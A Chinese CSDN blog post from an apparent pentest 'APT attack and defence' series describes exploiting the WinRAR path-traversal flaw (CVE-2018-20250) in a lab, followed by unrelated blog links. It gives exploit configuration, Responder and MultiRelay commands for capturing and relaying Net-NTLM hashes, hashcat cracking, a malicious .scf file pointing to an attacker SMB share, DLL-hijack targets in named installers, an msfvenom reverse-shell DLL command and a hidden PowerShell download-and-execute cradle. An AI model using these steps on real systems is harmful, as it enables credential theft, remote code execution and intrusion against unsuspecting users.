渗透测试-apt攻击与防御系列-利用WinRAR跨目录获取Net-NTLM Hash和DLL劫持

于 2022-09-05 17:30:58 发布
阅读量981 收藏 1
点赞数
文章标签: 哈希算法 服务器 运维 linux 系统安全
amingMM
本文链接:https://blog.csdn.net/qq_33608000/article/details/126708238
版权

apt攻击与防御系列

致敬亮神-2019

利用WinRAR跨目录获取Net-NTLM Hash和DLL劫持

域控:Windows 2008 R2
目标主机:Windows7*2

漏洞利用

  1. 穿透目录释放文件到开机启动菜单
  2. 获取受害者的Net NTLM Hash
  3. 借助下载文件夹安装程序DLL劫持
  4. 投放恶意的 LNK 文件

获取受害者的Net-NTLM Hash

⼯具:responder、hashcat
https://github.com/lgandx/responder/
https://hashcat.net/hashcat/

⼯作组⼯具:https://github.com/WyAtu/CVE-2018-20250
把下⾯的target_filename中的IP地址改成攻击者的就可以了。

# The archive filename you want 
rar_filename = "test.rar" 
# The evil file you want to run 
evil_filename = "WinRAR.dll" 
# The decompression path you want, such shown below 
target_filename = r"C:\\\x.x.x.x\smb\SHFOLDER.dll" 
# Other files to be displayed when the victim opens the winrar 
# filename_list=[] 
filename_list = ["hello.txt", "world.txt"]

查看配置⽂件 /usr/share/responder/Responder.conf ,检查SMB服务是否为On。

使⽤的⽹卡是vboxnet0,需要root权限。通过使⽤参数-I指定⽹卡运⾏

 sudo responder -I vboxnet0 -wrfv --lm

在这里插入图片描述
有主机通过SMB共享访问了我的Arch,并获取到了⽤⼾名和Net NTLM
Hash。

在这里插入图片描述
获取到Net NTLM Hash之后

使⽤HashCat来暴⼒破解

就我的Intel 的破CPU都能跑1277.4 kH/s
不过之前要安装OpenCL的库,如果是⽤显卡跑就更快了。

把最后⼀个Hash复制出来
在这里插入图片描述
查看加密算法模块对应的编号,上⾯看到的是 NTLMv2 ,所以我们使⽤5600

 ~ hashcat --help|grep NTLM 
 5500 | NetNTLMv1 | Network Protocols 
 5500 | NetNTLMv1+ESS | Network Protocols 
 5600 | NetNTLMv2 | Network Protocols 
 1000 | NTLM | Operating Systems

在这里插入图片描述
截图上⾯我标记出来的就是密码了,
只要你的字典够强⼤,我的字典只有⼀万⾏,⼀秒都不⽤就跑完了。
拿到密码就可以登录上去或者执⾏各种命令都是可以的。

域控

如果⽬标是域控就可以使⽤Hash中继来直接登录域内的主机。
还是打开responder的配置⽂件,这次是把HTTP和SMB服务改成Off,
因为等⼀下⽤到另⼀个⼯具的时候要监听445和80端⼝。

⼯具:MultiRelay.py,在responder的tool⽬录下。
最好先切换到responder⽬录下,
因为在获取到Windows的Shell的时候要使⽤MultiRelay⽬录⾥的⼯具。

 ~ cd /usr/share/responder/tools 
 sudo python2 ./MultiRelay.py -t 192.168.56.106 -u ALL

-t后⾯接着是你想攻击主机的IP地址,
-u是⽤⼾名,这⾥选择所有,就是ALL。

再打开⼀个终端,执⾏

~ sudo responder -I vboxnet0 -wrfv --lm

现在只要域控访问了Arch监听的SMB服务,
就可以获取域控的Net NTLM Hash,这样就可以登录域内的主机了,基本是指哪打哪。

在这里插入图片描述
拿到了主机权限,可以读取明⽂密码。
但是这⾥上传到主机 的被⽕绒拦截了。
在这里插入图片描述
在这里插入图片描述

释放SCF⽂件

还有⼀种释放.scf⽂件获取⽬标的Net NTLM Hash的,
释放到磁盘的根⽬录,只要打开我的电脑就会访问攻击 者的SMB服务,
获取Hash⼀把梭。
新建⼀个⽂本后缀改为.scf,把下⾯的内容复制进去,
IP地址改为攻击者的。
添加进压缩包,其实解压到能看到的地⽅都可以触发。

 [Shell] Command=2 
 IconFile=\\x.x.x.x\icon.ico 
 [Taskbar] Command=ToggleDesktop

当然还有desktop.ini、autorun.inf这些可以设置icon图标和设置⽂件夹的背景图⽚的,
也可以使⽤file协议远程 加载攻击者的SMB服务

借助下载⽂件夹安装程序DLL劫持

因为WinRAR这个跨⽂件⽬录释放的漏洞本来就不怎么容易利⽤,
⽽且DLL劫持也需要知道别⼈电脑⾥有什么软件,
还得知道别⼈装的软件哪⾥存在DLL劫持。这真的是难上加难了。所以下⾯的思路仅供脑补,会有很多很多假设。

既然我们不知道⽬标主机上有什么软件,那就要找⼀个⽐较通⽤的DLL,然后发现很多安装包程序就存在很多DLL劫持漏洞,
在测试时发现了阿⾥⼏个客⼾端都存在DLL劫持,
甚⾄连我想安装的⽕绒杀毒软件也存在同样的问题。

那我就推测是不是打包成安装包的⼯具有问题。
下⾯是我测试安装包,存在DLL劫持的,我只是测试了⼏个,这么巧,这⼏个都存在DLL劫持。
旺旺客⼾端的

C:\Windows\system32\CRYPTBASE.dll 
C:\Windows\system32\WindowsCodecs.dll 
C:\Windows\system32\SspiCli.dll 
C:\Windows\system32\dwmapi.dll 
C:\Windows\system32\ntmarta.dll 
C:\Windows\system32\dnsapi.DLL 
C:\Windows\system32\iphlpapi.DLL 
C:\Windows\system32\RASAPI32.dll 
C:\Windows\system32\rtutils.dll 
C:\Windows\system32\sensapi.dll 
C:\Windows\system32\rasadhlp.dll 
C:\Windows\system32\VERSION.dll

千⽜客⼾端的

C:\Windows\system32\CRYPTBASE.dll 
C:\Windows\system32\SHFOLDER.DLL 
C:\Windows\system32\ntmarta.dll 
C:\Windows\system32\dwmapi.dll

钉钉还有⽕绒也差不多和上⾯的⼀样,但是在测试时卡死了N次
在测试了上⾯⼏个安装包后统计出来⼀个特点,
你会发现DLL全部是⼤写字⺟的,⾮常的通⽤,SHFOLDER.DLL
可以⽀持三个安装包的劫持效果。
旺旺的可以使⽤RASAPI32.dll。 释放到下载⽬录的部分代码。

 # The archive filename you want 
 rar_filename = "test.rar" 
 # The evil file you want to run 
 evil_filename = "WinRAR.dll" 
 # The decompression path you want, such shown below 
 target_filename = r"C:\C:C:../Downloads\SHFOLDER.dll" 
 # Other files to be displayed when the victim opens the winrar 
 # filename_list=[] 
 filename_list = ["hello.txt", "world.txt"]

⽽且这些安装包会在⼀个⽐较固定的⽬录,那就是下载⽂件夹。
假设我利⽤WinRAR的跨⽬录释放了⼀个DLL到 了下载⽂件夹这个⽬录,
然后⽤⼾从上⾯这些客⼾端的安装包官⽅⽹站下载的正常⽂件回来,下载完了直接点 击打开运⾏,这样就会加载我释放出来的DLL,达到攻击的⽬的。

下⾯图⽚中是千⽜客⼾端的安装包加载下载⽬录中的DLL后打开了计算器,
在模块列表中看到是加载了攻击者的DLL。

在这里插入图片描述
⼯具:⼀个DLL⽂件。

 msfvenom -p windows/meterpreter/reverse_tcp LPORT=7788 LHOST=192.168.56.1 -a x86 -f dll >WinRAR.dll

MSF⽣成⼀个DLL
有⼀个问题劫持了之后安装包不能正常运⾏,这是DLL的问题,⾃⼰写的应该就不会了。
或者使⽤CobaltStrike⽣成的DLL可以正常安装,
但是要做好进程迁移,因为安装包结束了,⼦进程也会跟着关 闭,这样就控制不了了

投放LNK⽂件

在CobaltStrike⾥使⽤PowerShell远程加载。

 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.56.109:80/a'))"

⼀般弄⼀个常⻅的快捷键什么都会被杀毒软件拦截。

参考

https://github.com/incredibleindishell/Windows-AD-environment-related/tree/master/Responder
https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

amingMM
关注
博客
开发知识点-前端-微信小程序开发
04-27 464
 TP5+商城小程序——静态调用还是实例对象调用Apache详解 :QSA,PT,L,E参数的作用AOP 面向切面 编程思想 提取这样就完成了如下所示 空白自定义建立底部tar文件夹 不然会报错好了 根据状态bar 拉伸的小程序 bar 做好了顶部自定义准备好 后 我们导入我们小程序 万能美化包且完成我们顶部搜索模版大框且引入模版 准备测试效果额,,,emmmm~ 看到了 我们美化模板 的位置不怎么友好我们把他们的位置调整一下横纵都来一下。
博客
Android原生开发基础
04-27 561
发展历史 发行版本加载 布局模拟器 系统版本 getcolor对 服务器 传参 不一样。
博客
红队系列-网络安全知识锦囊-CTF(持续更新)
04-25 861
wireshark古典密码 现代密码学图片 视频 音频隐写photoshop攻击脚本writeup 官方 给的 解题思路web misc 密码学轮数限制 服务器 xxx掉混合模式 防守模式实战模式编码方式?id-2%df%df 只要 大于128 就可hackbar 用时尽量转码注入 语句 前缀。
博客
红队专题-漏洞挖掘-代码审计-反序列化
04-21 1948
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
博客
vue-i18n国际化多国语言
01-11 591
new实例的时候在这里面new比较好,不要去什么main.js里面new然后再挂载,因为在国家化的过程中,有很大概率在外部js中也有文字需要国际化,这时就没办法在外部js访问到国际化实例了。注意:uni.setLocale()方法需要在this.$i18n.locale切换语言之后再调用,否则app端会有问题,语言切换不能实时显示。如tabBar.home为首页tabbar对应的key,key后面的值代表当前的语言环境文字,中文环境下为“首页”,英文环境下为home,key命名的时候尽量语义化一点。
博客
MacBook_Xcode_Swift雨燕
01-03 832
其简洁语法、类型安全、Optionals处理、Playgrounds交互式环境、泛型编程、协议与扩展、闭包功能、枚举与关联值、结构体与类的高效内存管理、异步编程的async/await语法、Swift Package Manager依赖管理工具、SwiftUI声明式界面构建以及Combine响应式编程框架,共同构成了Swift的全面特性。Swift以其强大的功能和安全性提供了一个卓越的开发体验,并且随着技术发展,Swift将继续引入创新特性以提升开发效率和应用质量。作为Apple平台开发者的首选语言,
博客
前端基础-JavaScript/TypeScript语法
12-25 736
对象解构语法可以让你从一个对象中提取出若干属性,然后将其赋值给对应的变量,让代码看起来更简洁、易读。这在处理复杂的数据结构时尤为有用,例如从 API 返回的 JSON 数据中提取出需要的属性。字符串数组。使用解构赋值语法将数组的元素按照顺序依次赋值给对应的变量。不足元素,对应位置的变量将会被赋值为 undefined。
博客
shellcode AV bypass Evasion免杀合集
12-13 1076
360全家桶360核晶引擎网防G01火绒百度腾讯安全狗金山瑞星江民 (iangMin)江民科技—终端安全守护者 官网 (jiangmin.com)Kaspersky 卡巴斯基针对于内存的查杀企业版易视诺德它是迄今作为先进杀毒技术———启发式杀毒(Heuristic),最具准确高效的杀毒软件,国外很权威的防病毒软件评测给了NOD32很高的分数,在全球共获得超过40多个奖项麦咖啡AVG科摩多火眼诺顿启发式查杀很厉害,需要给木马加入正常程序的图标、版
博客
恶意代码分析
12-09 1645
著名防火墙公司Palo Alto Networks近日在官网公布了一个CVE-2024-3400的漏洞信息,该漏洞存在于部分PAN-OS系统的GlobalProtect功能中,在某些配置打开的情况下,攻击者可以对运行该系统的设备进行未授权RCE,并且拿到系统的root权限。A5.这一恶意代码会使用高层API函数连接到一个远程的FTP服务器,我们可以下载并建立一个本地FTP服务器,并将DNS请求重定向至这一服务器,以充分分析该恶意代码。所以,其一旦广泛传播开便极难彻底清除。然后启动lab20-2.exe。
博客
前端框架-小程序uniApp
12-03 1124
获取集合Collection示例如下。nosql 非关系型数据库。
博客
web3去中心化
11-14 1010
以以太坊(Ethereum)为主流,也包括Solana、Aptos等其他非EVM链。区块链本身是软件,需要运行在一系列节点上,这些节点组成P2P网络或者半中心化网络。节点不仅负责接收新的输入并生成新的区块,还需要存储区块链运行时产生的所有数据,并负责同步、对外提供查询等RPC服务。
博客
项目技术栈-解决方案-注册中心
11-14 300
服务注册中心(Registry):用于保存 RPC Server 的注册信息,当 RPC Server 节点发生变更时,Registry 会同步变更,RPC Client 感知后会刷新本地 内存中缓存的服务节点列表。服务提供者(RPC Server):在启动时,向 Registry 注册自身服务,并向 Registry 定期发送心跳汇报存活状态。
博客
项目技术栈-解决方案-消息队列
11-14 1035
优选Kafka。
博客
微服务和VUE入门教程(16): zuul 熔断
07-20 629
1. 前言在开发工程中,我们发现当一个微服务挂掉之后,如果我们访问此微服务的接口,zuul也会挂掉。因为zuul负责分配请求,当目标微服务挂掉之后,zuul便找不到目标微服务,因为我们需要设置一个熔断,即使寻找不到目标微服务,zuul也不会挂掉。比如我们停掉my-user微服务,然后访问其中的一个接口,zuul会出现以下错...
博客
PHP_CMS系统代码解析-wordpress
06-05 563
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。模板基本文件使用模板通过函数的调用,让模板之间形成完整的整体。style.css : CSS(样式表)文件index.php : 主页模板archive.php : Archive/Category模板...
博客
机器学习与量化交易 分类任务
06-05 750
> Julyedu.com 感谢 白嫖的 七月在线 专注数据领域的在线教育01 自动化交易综述时间序列分析策略建模及其优化方法策略评价与回测风险管理交易策略的实现交易策略的执行BP(Back Proppagation)算法误差反向传播(Error Back Propagation, BP)算法。学习过程由信号的正向传播与误差的反向传播两个过程组成。Algorithmic Tra...
博客
vue-i18n国际化多国语言
06-03 554
uniapp是自带有i18n这个插件需要自己去给每一个需要国际化的字符去手动配置key,所以如果是已经完成的项目可能工作量就稍微有点大了第一步:语言命名是有规范的不能乱取名,具体可以参考国际语言代码https://blog.csdn.net/weixin_44988005/article/details/113826664https://blog.csdn.net/hcx_2008/a...
博客
雷池waf功能代码剖析
05-31 531
看到他们发文章​-动态防护功能?了解一下具体是什么功能就是处理了一下 html 和 js看一下雷池代码的 构成是 后台的代码Go 语言使用Gin框架启动一个API服务器...
博客
漏洞复现-H3C系列
03-15 1475
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
博客
漏洞复现-红帆OA系列
03-15 1780
红帆OA--------------------------------------------fofa:app=“红帆-ioffice”
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值